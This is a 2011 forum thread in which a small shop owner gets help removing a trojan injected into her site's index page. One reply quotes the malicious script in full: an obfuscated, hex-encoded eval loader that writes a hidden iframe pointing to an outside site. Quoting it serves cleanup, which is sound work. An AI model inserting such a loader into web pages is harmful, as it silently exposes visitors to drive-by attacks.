joyces Posted August 21, 2011 Posted August 21, 2011 Hi Everyone I had a trojan on my index.html page a couple of weeks ago. It was my own fault as I hadn't set the permissions correctly. My index page sits on the server in public_html and feeds into the catalog folder which also sits at the same level in public_html. Hope that makes sense. I had set the permissions correctly for the catalog folder and as far as I could see the trojan was only on the index page. I took it down and put up a clean emergency stop-gap page (still there at the moment) and set the permission correctly and as far as I could see all was now ok. I have had an e-mail from one of my reps to say that he gets a warning when he goes to my site: "A known bad file was blocked from opening index[1].htm (exploit)" I have tried visiting my site from a number of different computers, all with anti-virus, but don't get the warning. Can anyone please have a look at this link and let me know if they get a warning and can anyone tell me whether this means it is a trojan. Also can anyone tell me how I find out which pages are affected. http://www.kingsandqueens.org.uk/catalog/index.php?cPath=64_81 Thanks to anyone who can spare the time Joyces
germ Posted August 21, 2011 Posted August 21, 2011 The index.html in the root of the site has a trojan javascript at the very end of the source. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
Guest Posted August 21, 2011 Posted August 21, 2011 Joyces, This is the script that needs to be removed: <script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f6578706c6f726574726176656c6e757273696e672e636f6d2f6e6577732e7068703f74703d66646661336165353965343464313930222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr+arr[i+1],16));eval(t);</script> Chris
joyces Posted August 21, 2011 Author Posted August 21, 2011 Thank you both so much. Was so worried couldn't sleep, had to get up and check for replies. I have removed the code. When I was checking the permissions on index.html it had reverted back to 777 although I know I changed it to 644 after I re-read Spooks' great thread on how to secure your site. I think I also read somewhere that some hosts/servers only work on file permissions of 777 and I think the advice was to "change hosts". Unless anyone knows of an alternative explanation I will pursue that with them tomorrow and if it's true maybe I will then pursue them with a big stick! Anyway thanks a lot Joyces
Guest Posted August 21, 2011 Posted August 21, 2011 Joyces, Ensure you have removed ALL malicious code and anomalous files. Hackers often place backdoors on servers which give them unrestricted access to your hosting account. Chris
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.